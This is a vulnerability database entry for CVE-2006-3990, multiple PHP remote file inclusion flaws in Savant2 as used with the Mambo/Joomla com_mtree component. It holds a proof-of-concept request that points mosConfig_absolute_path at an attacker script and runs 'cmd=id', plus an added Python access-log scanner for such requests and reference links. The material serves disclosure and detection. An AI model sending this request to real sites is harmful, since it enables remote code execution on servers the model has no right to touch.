Paul M. Jones Savant2 Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1110677
Vulnerability type: Input validation
Published: 2006-07-25
Updated: 2006-08-08
CVE ID: CVE-2006-3990
CNNVD-ID: CNNVD-200608-064
Platform: PHP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/28273
https://cxsecurity.com/issue/WLB-2006080033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-064
|Vulnerability Details
Paul M. Jones Savant2 contains multiple PHP remote file inclusion vulnerabilities. Possibly when used with the com_mtree component for Mambo and Joomla, remote attackers can execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to the following scripts: (1) Savant2_Plugin_stylesheet.php, (2) Savant2_Compiler_basic.php, (3) Savant2_Error_pear.php, (4) Savant2_Error_stack.php, (5) Savant2_Filter_colorizeCode.php, (6) Savant2_Filter_trimwhitespace.php, (7) Savant2_Plugin_ahref.php, (8) Savant2_Plugin_ahrefcontact.php, (9) Savant2_Plugin_ahreflisting.php, (10) Savant2_Plugin_ahreflistingimage.php, (11) Savant2_Plugin_ahrefmap.php, (12) Savant2_Plugin_ahrefownerlisting.php, (13) Savant2_Plugin_ahrefprint.php, (14) Savant2_Plugin_ahrefrating.php, (15) Savant2_Plugin_ahrefrecommend.php, (16) Savant2_Plugin_ahrefreport.php, (17) Savant2_Plugin_ahrefreview.php, (18) Savant2_Plugin_ahrefvisit.php, (19) Savant2_Plugin_checkbox.php, (20) Savant2_Plugin_cycle.php, (21) Savant2_Plugin_dateformat.php, (22) Savant2_Plugin_editor.php, (23) Savant2_Plugin_form.php, (24) Savant2_Plugin_image.php, (25) Savant2_Plugin_input.php, (26) Savant2_Plugin_javascript.php, (27) Savant2_Plugin_li
|Exploit
source: http://www.securityfocus.com/bid/19151/info

Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

http://www.example.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
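
A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags requests to Savant2 scripts under com_mtree that supply mosConfig_absolute_path in the query string. The log lines, hostnames and verdict labels are constructed for illustration, and only query strings visible in the access log are inspected.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2006:10:00:01 +0000] "GET /components/com_mtree/Savant2/'
    'Savant2_Plugin_stylesheet.php?mosConfig_absolute_path='
    'http%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Jul/2006:10:02:13 +0000] "GET /mambo/components/com_mtree/'
    'Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?'
    '&cmd=id HTTP/1.1" 200 87',
    '203.0.113.5 - - [25/Jul/2006:10:03:40 +0000] '
    '"GET /index.php?option=com_mtree&task=listcats HTTP/1.1" 200 9310',
]

PARAM = "mosConfig_absolute_path"   # parameter named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any Savant2_*.php script shipped inside the com_mtree component directory.
SAVANT2 = re.compile(r"/components/com_mtree/Savant2/(Savant2_\w+\.php)$", re.I)
# A value that starts with "scheme://" points the include at a remote resource.
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def classify(line):
    """Return (client, script, verdict) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = SAVANT2.search(unquote(url.path))
    if not script:
        return None
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.split("[")[0] == PARAM:      # also matches the array form
            remote = SCHEME.match(value.strip())
            verdict = "remote-url" if remote else "param-override"
            return (line.split()[0], script.group(1), verdict)
    return None

def scan(lines):
    """Classify every log line and keep only the flagged requests."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "param-override" hit still deserves review: the advisory's own request form passes a value without a scheme, and the query string is not where a site's configured path would normally come from.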
|References

Source: XF
Name: savant-multiple-plugin-file-include(27906)
Link: http://xforce.iss.net/xforce/xfdb/27906
Source: BID
Name: 19151
Link: http://www.securityfocus.com/bid/19151
Source: BUGTRAQ
Name: 20060721 [KurdishSecurity #13] Savant2 Remote File Include Vulnerability [For Mambo, Joomla]
Link: http://www.securityfocus.com/archive/1/archive/1/440835/100/200/threaded
Source: SECTRACK
Name: 1016560
Link: http://securitytracker.com/id?1016560
Source: OSVDB
Name: 28712
Link: http://www.osvdb.org/28712
Source: OSVDB
Name: 28711
Link: http://www.osvdb.org/28711
Source: OSVDB
Name: 28710
Link: http://www.osvdb.org/28710
Source: OSVDB
Name: 28709
Link: http://www.osvdb.org/28709
Source: OSVDB
Name: 28708
Link: http://www.osvdb.org/28708
Source: OSVDB
Name: 28707
Link: http://www.osvdb.org/28707
Source: OSVDB
Name: 28706
Link: http://www.osvdb.org/28706
Source: OSVDB
Name: 28705
Link: http://www.osvdb.org/28705
Source: OSVDB
Name: 28704
Link: http://www.osvdb.org/28704
Source: OSVDB
Name: 28703
Link: http://www.osvdb.org/28703
Source: OSVDB
Name: 28702
Link: http://www.osvdb.org/28702
Source: OSVDB
Name: 28701
Link: http://www.osvdb.org/28701
Source: OSVDB
Name: 28700
Link: http://www.o